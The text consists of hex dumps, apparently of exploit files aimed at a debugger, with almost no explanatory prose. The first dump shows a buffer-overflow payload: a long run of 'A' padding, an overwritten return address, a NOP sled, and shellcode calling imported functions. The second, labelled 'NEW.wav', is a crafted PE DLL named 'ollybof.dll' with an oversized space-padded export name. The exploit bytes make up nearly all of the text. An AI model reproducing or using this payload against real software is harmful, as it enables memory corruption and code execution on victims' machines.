41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000460 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000470 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000480 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000490 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000004F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000500 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000510 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000520 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000530 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000540 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000550 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000560 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000570 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000580 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000590 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000005F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000600 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000610 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000620 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000630 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000640 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000650 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000660 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000670 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000680 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000690 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006B0 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000006F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000750 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000760 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000770 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000780 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000790 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000007F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000800 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000810 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000820 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000830 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000840 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000850 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000860 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000870 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000880 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000890 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000008F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000900 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000910 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000920 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000930 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000940 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000950 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000960 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000970 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000980 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000990 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000009F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A10 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000A90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000AF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000B90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BC0 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000BF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000C90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000CF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D70 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000D90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000DF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000E90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000EA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000EB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000EC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000ED0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000EE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000EF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F20 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000F90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000FF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001010 8A 1D F3 77 90 90 90 90 6A 00 8B C4 83 C0 27 50 Љ уw j ‹ДѓА'P 00001020 50 6A 00 8B C4 83 C0 2B 50 FF 25 54 C2 4C 00 6A Pj ‹ДѓА+Pя%TВL j 00001030 00 FF 25 28 C2 4C 00 41 4D 4E 45 53 49 41 41 41 я%(ВL AMNESIAAA 00001040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000010A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000010B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000010C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000010D0 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 AAAAAAAAAAAAAAAA 000010E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000010F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001110 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAA

NEW.wav
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00 MZЂ яя 00000010 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 @ @ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 Ђ 00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 є ґ Н!ё LН!Th 00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00000070 6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00 mode. $ 00000080 50 45 00 00 4C 01 02 00 4F 22 8A 4E 00 00 00 00 PE L O"ЉN 00000090 00 00 00 00 E0 00 0E 21 0B 01 01 44 00 02 00 00 а ! D 000000A0 00 12 00 00 00 00 00 00 00 10 00 00 00 10 00 00 000000B0 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 @ 000000C0 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 000000D0 00 40 00 00 00 02 00 00 F9 40 00 00 02 00 00 00 @ щ@ 000000E0 00 10 00 00 00 10 00 00 00 00 01 00 00 00 00 00 000000F0 00 00 00 00 10 00 00 00 00 20 00 00 63 10 00 00 c 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000170 00 00 00 00 00 00 00 00 2E 63 6F 64 65 00 00 00 .code 00000180 0C 00 00 00 00 10 00 00 00 02 00 00 00 02 00 00 00000190 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 ` 000001A0 2E 65 64 61 74 61 00 00 63 10 00 00 00 20 00 00 .edata c 000001B0 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 000001C0 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 @ @ 000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000200 55 89 E5 B8 
01 00 00 00 C9 C2 0C 00 00 00 00 00 U‰её ЙВ 00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000003F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000400 00 00 00 00 00 00 00 00 00 00 00 00 32 20 00 00 2 00000410 01 00 00 00 01 00 00 00 01 00 00 00 28 20 00 00 ( 00000420 2C 20 00 00 30 20 00 00 28 20 00 00 3E 20 00 00 , 0 ( &gt; 
00000430 00 00 6F 6C 6C 79 62 6F 66 2E 64 6C 6C 00 31 31 ollybof.dll 11 00000440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000004F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000500 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000510 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000520 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000530 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000540 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000550 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000560 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000570 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000580 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000590 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000005F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000600 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000610 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000620 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000630 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000640 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000650 20 20 20 20 20 20 20 20 20 20 20 20 
